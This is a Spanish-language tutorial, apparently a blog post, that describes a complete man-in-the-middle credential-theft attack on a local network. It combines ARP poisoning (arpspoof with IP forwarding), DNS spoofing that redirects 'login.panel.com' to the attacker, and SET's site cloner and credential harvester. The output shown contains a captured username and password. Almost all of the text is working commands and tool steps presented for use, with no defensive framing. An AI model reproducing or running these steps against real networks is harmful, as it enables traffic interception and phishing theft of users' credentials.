El ataque DNS SPOOFING es un extra del envenenamiento ARP.
Primero, envenenamos la tabla ARP para hacer pasar el trafico por nuestro equipo atacante y a continuación levantamos un servidor dns propio para redirigir a nuestra victima a la máquina atacante.
Para realizar el DNS SPOOFING primero tenemos que realizar un envenenamiento de la tabla ARP (ARP SPOOFING) de los equipos haciendoles creer que nuestro equipo es el router de la red. (con el ip_forward activado) para que nuestra máquina haga forward de los paquetes.
En este caso nuestro escenario, seria este:
Equipo victima: 192.168.1.88
Router red: 192.168.1.1
Atacante: 192.168.1.50
1. ARP SPOOFING: Ejecutamos en la máquina atacante:
# arpspoof -i eth0 192.168.1.1
# echo 1 > /proc/sys/net/ipv4/ip_forward
Con el comando anterior, permanentemente lo que haremos es decirle a TODOS los dispositivos de la red que 192.168.1.1 somos nosotros (el atacante 192.168.1.50) por lo que todos los hosts de esta red enviarán el trafico hacia nuestro equipo y nosotros lo reenviaremos al router real (por eso el ip_forward activado).
2. DNSSPOOF:
Esta utilidad se puede encontrar en distribuciones como Kali Linux y lo que hará es solamente realizar la resolución de nombres que hayamos indicado. Es decir, todas las consultas las ignorará, solamente realizará el «engaño» en los hosts que hayamos indicado en ‘resol.txt’:
– Creamos el archivo resol.txt:
echo «192.168.1.50 login.panel.com» > resol.txt
– Ejecutamos dnspoof:
dnsspoof -i eth0 -f resolt.txt
Con dnsspoof ejecutandose y escuchando peticiones DNS, cuando alguien decida visitar login.panel.com lo que estará haciendo es resolver hacia nuestra maquina atacante. Con lo que si nosotros armamos una «copia» de la web que queramos podemos engañar a la victima para conseguir las credenciales que nos interesan.
Para realizar la copia del sitio y levantar un servidor web con el contenido «clon» podemos utilizar la utilidad ‘settoolkit’ que viene con Kali Linux:
Esta son las opciones que tendremos que usar dentro de settoolkit:
/usr/share/set/setoolkit
1 – Social Engineering Attacks
2 – Website Attack Vectors
3 – Credential Harvester Attack Method
2 – Site Cloner
IP Address for the POST back….: 192.168.1.50 <IP de nuestra maquina. Atacante>
Enter the url to clone: login.panel.com
Una vez que hayamos completado los pasos anteriores settoolkit quedará ejecutandose. La victima, al visitar ‘login.panel.com’ y introducir ahi sus credenciales, obtendriamos esto:
(‘Array\n’,)
(‘(\n’,)
(‘ [type] => account\n’,)
(‘ [username] => Juan\n’,)
(‘ [password] => 2250\n’,)
(‘ [Submit] => Log In\n’,)
(‘)\n’,)
Como podemos observar, el usuario ha introducido ‘Juan’ como usuario y ‘2250’ como password.
Eso es todo.